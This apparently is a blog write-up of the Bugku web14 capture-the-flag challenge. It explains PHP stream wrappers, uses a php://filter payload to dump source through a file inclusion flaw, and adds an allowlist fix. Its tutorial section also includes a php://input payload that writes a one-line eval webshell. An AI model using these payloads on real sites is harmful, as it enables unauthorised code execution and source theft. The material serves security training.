Bugku CTF web14(Web)

0. Open the page and click the "click me? no" link

The URL bar shows http://114.67.246.176:15077/index.php?file=show.php , so a file inclusion vulnerability is likely.

A brief introduction to the php:// protocol:

  • Conditions:

    • allow_url_fopen: off/on (not required)
    • allow_url_include: only php://input, php://stdin, php://memory and php://temp require it to be on
  • Action:
    php:// gives access to the respective input/output streams (I/O streams). The two most often used in CTFs are php://filter and php://input: php://filter for reading source code, php://input for executing PHP code.
  • Description:
    PHP provides a number of miscellaneous input/output (I/O) streams that give access to PHP's own input and output streams, the standard input, output and error descriptors,
    in-memory and disk-backed temporary file streams, and filters that can be applied to other readable and writable file resources.

    Protocol                     Effect
    php://input                  Read-only stream giving access to the raw request body. When the POST request uses enctype="multipart/form-data", the POST data is not available through php://input.
    php://output                 Write-only stream that writes to the output buffer in the same way as print and echo.
    php://fd (>=5.3.6)           Direct access to the given file descriptor; for example, php://fd/3 refers to file descriptor 3.
    php://memory, php://temp (>=5.1.0)  File-like streams for reading and writing temporary data. The only difference is that php://memory always keeps the data in memory, whereas php://temp moves it to a temporary file once it exceeds a predefined memory limit (default 2MB). The temporary file location is chosen the same way sys_get_temp_dir() chooses it.
    php://filter (>=5.0.0)       A meta-wrapper that applies filters to a stream as it is opened. It is useful with all-in-one file functions such as readfile(), file() and file_get_contents(), where there is otherwise no opportunity to apply a filter before the stream content is read.
  • php://filter parameters in detail

    The parameters of the wrapper are passed as part of the path, and several parameters can be passed in the same path. The specific parameters are as follows:

    php://filter parameter          Description
    resource=<stream to be filtered>  Required. Specifies the data stream you want to filter.
    read=<read chain filter list>     Optional. One or more filter names, separated by the pipe character (|).
    write=<write chain filter list>   Optional. One or more filter names, separated by the pipe character (|).
    <filter list for both chains>     Any filter list not prefixed with read= or write= is applied to both the read and write chains as appropriate.
  • List of available filters (4 categories)

    The main filter types are listed here. For details, refer to https://www.php.net/manual/zh/filters.php

    String filter                  Effect
    string.rot13                   Equivalent to str_rot13(); applies the rot13 transform
    string.toupper                 Equivalent to strtoupper(); converts to upper case
    string.tolower                 Equivalent to strtolower(); converts to lower case
    string.strip_tags              Equivalent to strip_tags(); removes HTML and PHP tags

    Conversion filter              Effect
    convert.base64-encode & convert.base64-decode  Equivalent to base64_encode() and base64_decode(); base64 encoding and decoding
    convert.quoted-printable-encode & convert.quoted-printable-decode  Encoding and decoding between quoted-printable and 8-bit strings

    Compression filter             Effect
    zlib.deflate & zlib.inflate    Produce gzip-compatible data, but without the header and trailer information written by command-line tools such as gzip; only the payload part of the stream is compressed or decompressed.
    bzip2.compress & bzip2.decompress  Same as above, for bz2-compatible data.

    Encryption filter              Effect
    mcrypt.*                       libmcrypt symmetric encryption algorithms
    mdecrypt.*                     libmcrypt symmetric decryption algorithms
  • Examples:

    1. php://filter/read=convert.base64-encode/resource=[filename] reads the file's source code (base64 encoding is required for PHP files, otherwise they would be executed rather than displayed)

      http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php

    2. php://input + [POST DATA] executes PHP code

      http://127.0.0.1/include.php?file=php://input
      [POST DATA part]
      <?php phpinfo(); ?>

      If you have write permission, write a one-line Trojan (webshell)

      http://127.0.0.1/include.php?file=php://input
      [POST DATA part]
      <?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

1. Construct the payload: http://114.67.246.176:15077/index.php?file=php://filter/read=convert.base64-encode/resource=index.php


This returns the source code of index.php base64-encoded; decoding it gives the source.

2. Base64-decode the result

<html>
    <title>Bugku-web</title>
    
<?php
    error_reporting(0);
    if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag:flag{58de618583143b308d6c079b4908ea77}
?>
</html>

3. The flag is obtained: flag{58de618583143b308d6c079b4908ea77}
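The blacklist in the recovered source rejects "../", "tp", "input" and "data" but not "filter", which is why the read-source payload passes it. As an added example that is not from the challenge or the original post, here is that check next to an allowlist-based include; the pages/ paths are assumptions:

```php
<?php
// Added example (not from the challenge or the original post): the
// challenge's blacklist beside an allowlist-based include.

// The challenge's check, as recovered from index.php above.
function blacklisted(string $file): bool
{
    return strstr($file, "../") !== false
        || stristr($file, "tp") !== false
        || stristr($file, "input") !== false
        || stristr($file, "data") !== false;
}
// blacklisted("php://filter/read=convert.base64-encode/resource=index.php")
// is false: neither "filter" nor "convert" is on the list, so include()
// receives the wrapper. php://filter on a local resource also works with
// allow_url_include=Off, so that setting does not help here. Adding "filter"
// to the list only narrows it; the durable fix is an allowlist.

// Hardened variant: map the parameter onto a fixed set of pages and never
// pass user input to include(). The file paths are assumptions.
const PAGES = [
    'show'  => __DIR__ . '/pages/show.php',
    'about' => __DIR__ . '/pages/about.php',
];

function resolvePage(?string $name): ?string
{
    if ($name === null || $name === '') {
        return PAGES['show'];        // default page
    }
    return PAGES[$name] ?? null;     // exact key match only, no path building
}

$path = resolvePage($_GET['file'] ?? null);
if ($path === null) {
    http_response_code(404);
    echo 'Unknown page';
    exit();
}
include $path;
```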


Origin blog.csdn.net/ChaoYue_miku/article/details/114107935